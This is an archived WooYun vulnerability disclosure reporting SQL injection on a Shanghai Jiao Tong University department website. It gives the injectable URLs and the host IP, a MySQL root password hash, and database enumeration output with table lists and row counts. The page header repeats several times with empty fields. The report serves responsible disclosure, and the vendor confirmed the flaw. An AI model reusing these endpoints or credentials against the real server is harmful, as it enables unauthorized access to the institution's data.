上海交大某站存在多处SQL注射导致三百多表泄露

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-093819

漏洞标题：上海交大某站存在多处SQL注射导致三百多表泄露

漏洞作者： Yang

提交时间：2015-01-25 16:05

修复时间：2015-03-11 16:06

公开时间：2015-03-11 16:06

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-01-25：细节已通知厂商并且等待厂商处理中
2015-01-25：厂商已经确认，细节仅向厂商公开
2015-02-04：细节向核心白帽子及相关领域专家公开
2015-02-14：细节向普通白帽子公开
2015-02-24：细节向实习白帽子公开
2015-03-11：细节向公众公开

简要描述：

这个应该没重复吧
没重复能上首页么？

详细说明：

漏洞存在于：http://envir.sjtu.edu.cn/
漏洞地址：http://envir.sjtu.edu.cn/TeachandStudy/FosterList.php?num=4&cnum=49&ID=49

Target: 		http://envir.sjtu.edu.cn/DetailDownLoadInfo.php?num=60&cnum=201&ID=1265
Host IP:		202.120.44.59
Web Server: 	Microsoft-IIS/7.5
Powered-by: 	PHP/5.3.10
Powered-by: 	ASP.NET
DB Server: 	MySQL >=5
Resp. Time(avg):	221 ms
Current User: 	root@localhost
DB User & Pass: 	root:*432ADA312C2AD598576DC0499CCC0BE0FC45FB9B:localhost
Current DB: 	environmentdb
Sql Version: 	5.5.20
Compile OS: 	Win32
Host Name: 	Server-SESE
Installation dir: 	C:/Program Files (x86)/MySQL/MySQL Server 5.5/
System User: 	root@localhost
Data Bases: 	information_schema
		drupal
		empirecms
		environmentdb
		envphy
		mysql
		performance_schema
		sesesite
		tenth
		test
		yard
		yard0
Current User: 	root@localhost
Current User: 	root@localhost
Current User: 	root@localhost

好多好多user 都是有密码的。但是不知道是什么系统的。。

漏洞证明：

我啥都不说

back-end DBMS: MySQL 5.0.11
Database: environmentdb
[22 tables]
+----------------------------------------------+
| admin                                        |
| columntype                                   |
| eadmin                                       |
| ecolumntype                                  |
| eimagelink                                   |
| einfo                                        |
| emenu                                        |
| eotherlink                                   |
| eresume                                      |
| erole                                        |
| eroletomenu                                  |
| eusertorole                                  |
| ewebinfo                                     |
| imagelink                                    |
| info                                         |
| menu                                         |
| otherlink                                    |
| resume                                       |
| role                                         |
| roletomenu                                   |
| usertorole                                   |
| webinfo                                      |
+----------------------------------------------+
Database: empirecms
[171 tables]
+----------------------------------------------+
| phome_ecms_article                           |
| phome_ecms_article_data_1                    |
| phome_ecms_article_doc                       |
| phome_ecms_article_doc_data                  |
| phome_ecms_download                          |
| phome_ecms_download_data_1                   |
| phome_ecms_download_doc                      |
| phome_ecms_download_doc_data                 |
| phome_ecms_flash                             |
| phome_ecms_flash_data_1                      |
| phome_ecms_flash_doc                         |
| phome_ecms_flash_doc_data                    |
| phome_ecms_info                              |
| phome_ecms_info_data_1                       |
| phome_ecms_info_doc                          |
| phome_ecms_info_doc_data                     |
| phome_ecms_infoclass_article                 |
| phome_ecms_infoclass_download                |
| phome_ecms_infoclass_flash                   |
| phome_ecms_infoclass_info                    |
| phome_ecms_infoclass_movie                   |
| phome_ecms_infoclass_news                    |
| phome_ecms_infoclass_photo                   |
| phome_ecms_infoclass_shop                    |
| phome_ecms_infotmp_article                   |
| phome_ecms_infotmp_download                  |
| phome_ecms_infotmp_flash                     |
| phome_ecms_infotmp_info                      |
| phome_ecms_infotmp_movie                     |
| phome_ecms_infotmp_news                      |
| phome_ecms_infotmp_photo                     |
| phome_ecms_infotmp_shop                      |
| phome_ecms_movie                             |
| phome_ecms_movie_data_1                      |
| phome_ecms_movie_doc                         |
| phome_ecms_movie_doc_data                    |
| phome_ecms_news                              |
| phome_ecms_news_data_1                       |
| phome_ecms_news_doc                          |
| phome_ecms_news_doc_data                     |
| phome_ecms_photo                             |
| phome_ecms_photo_data_1                      |
| phome_ecms_photo_doc                         |
| phome_ecms_photo_doc_data                    |
| phome_ecms_shop                              |
| phome_ecms_shop_data_1                       |
| phome_ecms_shop_doc                          |
| phome_ecms_shop_doc_data                     |
| phome_enewsad                                |
| phome_enewsadclass                           |
| phome_enewsadminstyle                        |
| phome_enewsbefrom                            |
| phome_enewsbq                                |
| phome_enewsbqclass                           |
| phome_enewsbqtemp                            |
| phome_enewsbqtemp_3                          |
| phome_enewsbqtemp_4                          |
| phome_enewsbqtempclass                       |
| phome_enewsbuybak                            |
| phome_enewsbuygroup                          |
| phome_enewscard                              |
| phome_enewschecktext                         |
| phome_enewsclass                             |
| phome_enewsclassadd                          |
| phome_enewsclasstemp                         |
| phome_enewsclasstemp_3                       |
| phome_enewsclasstemp_4                       |
| phome_enewsclasstempclass                    |
| phome_enewsdiggips                           |
| phome_enewsdo                                |
| phome_enewsdolog                             |
| phome_enewsdownerror                         |
| phome_enewsdownrecord                        |
| phome_enewsdownurlqz                         |
| phome_enewserrorclass                        |
| phome_enewsf                                 |
| phome_enewsfava                              |
| phome_enewsfavaclass                         |
| phome_enewsfeedback                          |
| phome_enewsfeedbackclass                     |
| phome_enewsfeedbackf                         |
| phome_enewsfile                              |
| phome_enewsgbook                             |
| phome_enewsgbookclass                        |
| phome_enewsgfenip                            |
| phome_enewsgroup                             |
| phome_enewshy                                |
| phome_enewshyclass                           |
| phome_enewsinfoclass                         |
| phome_enewsinfotype                          |
| phome_enewsinfovote                          |
| phome_enewsjstemp                            |
| phome_enewsjstemp_3                          |
| phome_enewsjstemp_4                          |
| phome_enewsjstempclass                       |
| phome_enewskey                               |
| phome_enewslink                              |
| phome_enewslinkclass                         |
| phome_enewslinktmp                           |
| phome_enewslisttemp                          |
| phome_enewslisttemp_3                        |
| phome_enewslisttemp_4                        |
| phome_enewslisttempclass                     |
| phome_enewslog                               |
| phome_enewsloginfail                         |
| phome_enewsmember                            |
| phome_enewsmemberadd                         |
| phome_enewsmemberf                           |
| phome_enewsmemberfeedback                    |
| phome_enewsmemberform                        |
| phome_enewsmembergbook                       |
| phome_enewsmembergroup                       |
| phome_enewsmod                               |
| phome_enewsnewstemp                          |
| phome_enewsnewstemp_3                        |
| phome_enewsnewstemp_4                        |
| phome_enewsnewstempclass                     |
| phome_enewsnotcj                             |
| phome_enewspage                              |
| phome_enewspageclass                         |
| phome_enewspayapi                            |
| phome_enewspayrecord                         |
| phome_enewspic                               |
| phome_enewspicclass                          |
| phome_enewspl                                |
| phome_enewspl_data_1                         |
| phome_enewsplayer                            |
| phome_enewsplf                               |
| phome_enewspltemp                            |
| phome_enewspltemp_3                          |
| phome_enewspltemp_4                          |
| phome_enewspostdata                          |
| phome_enewspublic                            |
| phome_enewspubtemp                           |
| phome_enewspubtemp_3                         |
| phome_enewspubtemp_4                         |
| phome_enewsqf                                |
| phome_enewsqmsg                              |
| phome_enewssearch                            |
| phome_enewssearchall                         |
| phome_enewssearchall_load                    |
| phome_enewssearchtemp                        |
| phome_enewssearchtemp_3                      |
| phome_enewssearchtemp_4                      |
| phome_enewssearchtempclass                   |
| phome_enewsshopdd                            |
| phome_enewsshoppayfs                         |
| phome_enewsshopps                            |
| phome_enewsspacestyle                        |
| phome_enewssql                               |
| phome_enewstable                             |
| phome_enewstask                              |
| phome_enewstempgroup                         |
| phome_enewstempvar                           |
| phome_enewstempvar_3                         |
| phome_enewstempvar_4                         |
| phome_enewstempvarclass                      |
| phome_enewstogzts                            |
| phome_enewsuser                              |
| phome_enewsuserjs                            |
| phome_enewsuserlist                          |
| phome_enewsvote                              |
| phome_enewsvotemod                           |
| phome_enewsvotetemp                          |
| phome_enewsvotetemp_3                        |
| phome_enewsvotetemp_4                        |
| phome_enewswapstyle                          |
| phome_enewswords                             |
| phome_enewswriter                            |
| phome_enewszt                                |
| phome_enewsztclass                           |
+----------------------------------------------+
Database: yard
[20 tables]
+----------------------------------------------+
| wp_awsomnews                                 |
| wp_btev_events                               |
| wp_calendar                                  |
| wp_comments                                  |
| wp_downloads                                 |
| wp_eventscalendar_main                       |
| wp_links                                     |
| wp_options                                   |
| wp_pollsa                                    |
| wp_pollsip                                   |
| wp_pollsq                                    |
| wp_postmeta                                  |
| wp_posts                                     |
| wp_slim_countries                            |
| wp_slim_stats                                |
| wp_term_relationships                        |
| wp_term_taxonomy                             |
| wp_terms                                     |
| wp_usermeta                                  |
| wp_users                                     |
+----------------------------------------------+
Database: performance_schema
[17 tables]
+----------------------------------------------+
| cond_instances                               |
| events_waits_current                         |
| events_waits_history                         |
| events_waits_history_long                    |
| events_waits_summary_by_instance             |
| events_waits_summary_by_thread_by_event_name |
| events_waits_summary_global_by_event_name    |
| file_instances                               |
| file_summary_by_event_name                   |
| file_summary_by_instance                     |
| mutex_instances                              |
| performance_timers                           |
| rwlock_instances                             |
| setup_consumers                              |
| setup_instruments                            |
| setup_timers                                 |
| threads                                      |
+----------------------------------------------+
Database: drupal
[64 tables]
+----------------------------------------------+
| access                                       |
| accesslog                                    |
| aggregator_category                          |
| aggregator_category_feed                     |
| aggregator_category_item                     |
| aggregator_feed                              |
| aggregator_item                              |
| authmap                                      |
| blocks                                       |
| book                                         |
| boxes                                        |
| cache                                        |
| comments                                     |
| directory                                    |
| files                                        |
| filter_formats                               |
| filters                                      |
| flood                                        |
| forum                                        |
| history                                      |
| img_assist_map                               |
| locales_meta                                 |
| locales_source                               |
| locales_target                               |
| menu                                         |
| moderation_filters                           |
| moderation_roles                             |
| moderation_votes                             |
| node                                         |
| node_access                                  |
| node_comment_statistics                      |
| node_counter                                 |
| nodewords                                    |
| permission                                   |
| poll                                         |
| poll_choices                                 |
| profile_fields                               |
| profile_values                               |
| queue                                        |
| role                                         |
| scheduler                                    |
| search_index                                 |
| search_total                                 |
| sequences                                    |
| spam_comments                                |
| spam_custom                                  |
| spam_nodes                                   |
| spam_statistics                              |
| spam_tokens                                  |
| system                                       |
| term_data                                    |
| term_hierarchy                               |
| term_node                                    |
| term_relation                                |
| term_synonym                                 |
| tinymce_role                                 |
| tinymce_settings                             |
| url_alias                                    |
| users                                        |
| users_roles                                  |
| variable                                     |
| vocabulary                                   |
| vocabulary_node_types                        |
| watchdog                                     |
+----------------------------------------------+
Database: envphy
[13 tables]
+----------------------------------------------+
| sjtu_ad                                      |
| sjtu_attachment                              |
| sjtu_blog                                    |
| sjtu_comment                                 |
| sjtu_link                                    |
| sjtu_navi                                    |
| sjtu_options                                 |
| sjtu_reply                                   |
| sjtu_sort                                    |
| sjtu_tag                                     |
| sjtu_tpl_options_data                        |
| sjtu_twitter                                 |
| sjtu_user                                    |
+----------------------------------------------+
Database: sesesite
[16 tables]
+----------------------------------------------+
| user                                         |
| accessories                                  |
| counter_area                                 |
| counter_browser                              |
| counter_daily                                |
| counter_detail                               |
| counter_month                                |
| counter_year                                 |
| emailpage                                    |
| indexvisit                                   |
| news                                         |
| newspic                                      |
| searchkw                                     |
| sesefaculty                                  |
| survey081120                                 |
| tag                                          |
+----------------------------------------------+
Database: yard0
[32 tables]
+----------------------------------------------+
| owa_click                                    |
| owa_configuration                            |
| owa_document                                 |
| owa_exit                                     |
| owa_feed_request                             |
| owa_host                                     |
| owa_impression                               |
| owa_os                                       |
| owa_referer                                  |
| owa_request                                  |
| owa_session                                  |
| owa_site                                     |
| owa_ua                                       |
| owa_user                                     |
| owa_visitor                                  |
| wp_awsomnews                                 |
| wp_calendar                                  |
| wp_comments                                  |
| wp_downloads                                 |
| wp_eventscalendar_main                       |
| wp_links                                     |
| wp_options                                   |
| wp_pollsa                                    |
| wp_pollsip                                   |
| wp_pollsq                                    |
| wp_postmeta                                  |
| wp_posts                                     |
| wp_term_relationships                        |
| wp_term_taxonomy                             |
| wp_terms                                     |
| wp_usermeta                                  |
| wp_users                                     |
+----------------------------------------------+
Database: mysql
[24 tables]
+----------------------------------------------+
| user                                         |
| columns_priv                                 |
| db                                           |
| event                                        |
| func                                         |
| general_log                                  |
| help_category                                |
| help_keyword                                 |
| help_relation                                |
| help_topic                                   |
| host                                         |
| ndb_binlog_index                             |
| plugin                                       |
| proc                                         |
| procs_priv                                   |
| proxies_priv                                 |
| servers                                      |
| slow_log                                     |
| tables_priv                                  |
| time_zone                                    |
| time_zone_leap_second                        |
| time_zone_name                               |
| time_zone_transition                         |
| time_zone_transition_type                    |
+----------------------------------------------+
Database: tenth
[36 tables]
+----------------------------------------------+
| jos_banner                                   |
| jos_bannerclient                             |
| jos_bannertrack                              |
| jos_categories                               |
| jos_components                               |
| jos_contact_details                          |
| jos_content                                  |
| jos_content_frontpage                        |
| jos_content_rating                           |
| jos_core_acl_aro                             |
| jos_core_acl_aro_groups                      |
| jos_core_acl_aro_map                         |
| jos_core_acl_aro_sections                    |
| jos_core_acl_groups_aro_map                  |
| jos_core_log_items                           |
| jos_core_log_searches                        |
| jos_groups                                   |
| jos_menu                                     |
| jos_menu_types                               |
| jos_messages                                 |
| jos_messages_cfg                             |
| jos_migration_backlinks                      |
| jos_modules                                  |
| jos_modules_menu                             |
| jos_newsfeeds                                |
| jos_plugins                                  |
| jos_poll_data                                |
| jos_poll_date                                |
| jos_poll_menu                                |
| jos_polls                                    |
| jos_sections                                 |
| jos_session                                  |
| jos_stats_agents                             |
| jos_templates_menu                           |
| jos_users                                    |
| jos_weblinks                                 |
+----------------------------------------------+
Database: information_schema
[37 tables]
+----------------------------------------------+
| CHARACTER_SETS                               |
| COLLATIONS                                   |
| COLLATION_CHARACTER_SET_APPLICABILITY        |
| COLUMNS                                      |
| COLUMN_PRIVILEGES                            |
| ENGINES                                      |
| EVENTS                                       |
| FILES                                        |
| GLOBAL_STATUS                                |
| GLOBAL_VARIABLES                             |
| INNODB_CMP                                   |
| INNODB_CMPMEM                                |
| INNODB_CMPMEM_RESET                          |
| INNODB_CMP_RESET                             |
| INNODB_LOCKS                                 |
| INNODB_LOCK_WAITS                            |
| INNODB_TRX                                   |
| KEY_COLUMN_USAGE                             |
| PARAMETERS                                   |
| PARTITIONS                                   |
| PLUGINS                                      |
| PROCESSLIST                                  |
| PROFILING                                    |
| REFERENTIAL_CONSTRAINTS                      |
| ROUTINES                                     |
| SCHEMATA                                     |
| SCHEMA_PRIVILEGES                            |
| SESSION_STATUS                               |
| SESSION_VARIABLES                            |
| STATISTICS                                   |
| TABLES                                       |
| TABLESPACES                                  |
| TABLE_CONSTRAINTS                            |
| TABLE_PRIVILEGES                             |
| TRIGGERS                                     |
| USER_PRIVILEGES                              |
| VIEWS                                        |
+----------------------------------------------+
Database: envphy
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| sjtu_options                          | 61      |
| sjtu_blog                             | 12      |
| sjtu_navi                             | 7       |
| sjtu_tag                              | 6       |
| sjtu_ad                               | 1       |
| sjtu_link                             | 1       |
| sjtu_sort                             | 1       |
| sjtu_twitter                          | 1       |
| sjtu_user                             | 1       |
+---------------------------------------+---------+
Database: empirecms
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| phome_enewsf                          | 105     |
| phome_enewsdolog                      | 56      |
| phome_enewsbq                         | 26      |
| phome_enewslink                       | 14      |
| phome_enewsbqtemp_4                   | 12      |
| phome_enewsmemberf                    | 12      |
| phome_enewsbqtemp                     | 10      |
| phome_enewsnewstemp_3                 | 10      |
| phome_enewsnewstemp_4                 | 10      |
| phome_enewsfeedbackf                  | 9       |
| phome_enewsnewstemp                   | 9       |
| phome_enewsbqtemp_3                   | 8       |
| phome_enewslisttemp                   | 8       |
| phome_enewslisttemp_3                 | 8       |
| phome_enewslisttemp_4                 | 8       |
| phome_enewsmod                        | 8       |
| phome_enewstable                      | 8       |
| phome_enewsshoppayfs                  | 6       |
| phome_enewstempvar                    | 6       |
| phome_enewstempvar_4                  | 6       |
| phome_enewsnotcj                      | 5       |
| phome_enewstempvar_3                  | 5       |
| phome_enewsbqclass                    | 4       |
| phome_enewsmembergroup                | 4       |
| phome_enewsplayer                     | 4       |
| phome_enewsshopps                     | 4       |
| phome_enewsclasstemp_3                | 3       |
| phome_enewspayapi                     | 3       |
| phome_enewstempgroup                  | 3       |
| phome_enewsclasstemp                  | 2       |
| phome_enewsclasstemp_4                | 2       |
| phome_enewsmemberform                 | 2       |
| phome_enewsspacestyle                 | 2       |
| phome_enewsvotetemp                   | 2       |
| phome_enewsvotetemp_3                 | 2       |
| phome_enewsvotetemp_4                 | 2       |
| phome_enewswapstyle                   | 2       |
| phome_enewsadclass                    | 1       |
| phome_enewsadminstyle                 | 1       |
| phome_enewsclass                      | 1       |
| phome_enewsclassadd                   | 1       |
| phome_enewsdo                         | 1       |
| phome_enewsfeedbackclass              | 1       |
| phome_enewsgbookclass                 | 1       |
| phome_enewsgroup                      | 1       |
| phome_enewsjstemp                     | 1       |
| phome_enewsjstemp_3                   | 1       |
| phome_enewsjstemp_4                   | 1       |
| phome_enewslog                        | 1       |
| phome_enewspicclass                   | 1       |
| phome_enewspltemp                     | 1       |
| phome_enewspltemp_3                   | 1       |
| phome_enewspltemp_4                   | 1       |
| phome_enewspublic                     | 1       |
| phome_enewspubtemp                    | 1       |
| phome_enewspubtemp_3                  | 1       |
| phome_enewssearchtemp                 | 1       |
| phome_enewsuser                       | 1       |
+---------------------------------------+---------+
Database: performance_schema
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| setup_consumers                       | 8       |
| performance_timers                    | 5       |
| setup_timers                          | 1       |
+---------------------------------------+---------+
Database: drupal
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| search_index                          | 91880   |
| spam_comments                         | 17171   |
| term_node                             | 15839   |
| node_counter                          | 8535    |
| node_comment_statistics               | 8534    |
| forum                                 | 8523    |
| spam_nodes                            | 8522    |
| node                                  | 8506    |
| watchdog                              | 2965    |
| locales_source                        | 2351    |
| locales_target                        | 2351    |
| accesslog                             | 1551    |
| spam_tokens                           | 624     |
| variable                              | 129     |
| system                                | 52      |
| menu                                  | 26      |
| blocks                                | 19      |
| spam_statistics                       | 11      |
| files                                 | 7       |
| sequences                             | 7       |
| term_hierarchy                        | 7       |
| vocabulary_node_types                 | 6       |
| filters                               | 5       |
| users_roles                           | 4       |
| filter_formats                        | 3       |
| permission                            | 3       |
| role                                  | 3       |
| users                                 | 3       |
| locales_meta                          | 2       |
| tinymce_role                          | 2       |
| tinymce_settings                      | 2       |
| vocabulary                            | 2       |
| node_access                           | 1       |
| poll                                  | 1       |
+---------------------------------------+---------+
Database: environmentdb
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| info                                  | 1124    |
| columntype                            | 119     |
| usertorole                            | 112     |
| einfo                                 | 107     |
| eusertorole                           | 89      |
| admin                                 | 81      |
| resume                                | 80      |
| eroletomenu                           | 74      |
| roletomenu                            | 74      |
| eresume                               | 73      |
| eadmin                                | 72      |
| ecolumntype                           | 72      |
| emenu                                 | 14      |
| menu                                  | 14      |
| erole                                 | 8       |
| role                                  | 8       |
| eimagelink                            | 5       |
| imagelink                             | 5       |
| ewebinfo                              | 1       |
| webinfo                               | 1       |
+---------------------------------------+---------+
Database: sesesite
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| counter_daily                         | 33096   |
| counter_detail                        | 29151   |
| counter_month                         | 1632    |
| indexvisit                            | 1620    |
| searchkw                              | 1192    |
| counter_area                          | 150     |
| counter_browser                       | 93      |
| counter_year                          | 72      |
| survey081120                          | 51      |
| `user`                                | 1       |
| accessories                           | 1       |
+---------------------------------------+---------+
Database: mysql
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| help_relation                         | 1028    |
| help_topic                            | 508     |
| help_keyword                          | 465     |
| help_category                         | 38      |
| `user`                                | 1       |
| proxies_priv                          | 1       |
+---------------------------------------+---------+
Database: tenth
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| jos_content                           | 53      |
| jos_modules                           | 39      |
| jos_components                        | 32      |
| jos_modules_menu                      | 32      |
| jos_plugins                           | 32      |
| jos_menu                              | 23      |
| jos_categories                        | 22      |
| jos_session                           | 15      |
| jos_newsfeeds                         | 14      |
| jos_poll_data                         | 12      |
| jos_poll_date                         | 12      |
| jos_core_acl_aro_groups               | 11      |
| jos_content_frontpage                 | 8       |
| jos_menu_types                        | 4       |
| jos_sections                          | 4       |
| jos_groups                            | 3       |
| jos_core_acl_aro                      | 2       |
| jos_core_acl_groups_aro_map           | 2       |
| jos_templates_menu                    | 2       |
| jos_users                             | 2       |
| jos_bannerclient                      | 1       |
| jos_contact_details                   | 1       |
| jos_content_rating                    | 1       |
| jos_core_acl_aro_sections             | 1       |
| jos_polls                             | 1       |
+---------------------------------------+---------+
Database: information_schema
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| COLUMNS                               | 5155    |
| STATISTICS                            | 823     |
| TABLES                                | 452     |
| PARTITIONS                            | 396     |
| KEY_COLUMN_USAGE                      | 385     |
| TABLE_CONSTRAINTS                     | 332     |
| SESSION_VARIABLES                     | 327     |
| GLOBAL_VARIABLES                      | 316     |
| GLOBAL_STATUS                         | 310     |
| SESSION_STATUS                        | 310     |
| COLLATION_CHARACTER_SET_APPLICABILITY | 195     |
| COLLATIONS                            | 195     |
| CHARACTER_SETS                        | 39      |
| USER_PRIVILEGES                       | 28      |
| PLUGINS                               | 20      |
| SCHEMATA                              | 12      |
| ENGINES                               | 9       |
| INNODB_CMP                            | 5       |
| INNODB_CMP_RESET                      | 5       |
| INNODB_CMPMEM                         | 5       |
| INNODB_CMPMEM_RESET                   | 5       |
| PROCESSLIST                           | 1       |
+---------------------------------------+---------+

修复方案：

过滤

版权声明：转载请注明来源 Yang@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：16

确认时间：2015-01-25 20:12

厂商回复：

谢谢，我们立即处理！

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-093819

漏洞标题：上海交大某站存在多处SQL注射导致三百多表泄露

相关厂商：sjtu.edu.cn

漏洞作者： Yang

提交时间：2015-01-25 16:05

修复时间：2015-03-11 16:06

公开时间：2015-03-11 16:06

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Yang@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-093819

漏洞标题：上海交大某站存在多处SQL注射导致三百多表泄露

相关厂商：sjtu.edu.cn

漏洞作者： Yang

提交时间：2015-01-25 16:05

修复时间：2015-03-11 16:06

公开时间：2015-03-11 16:06

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-093819"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Yang@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：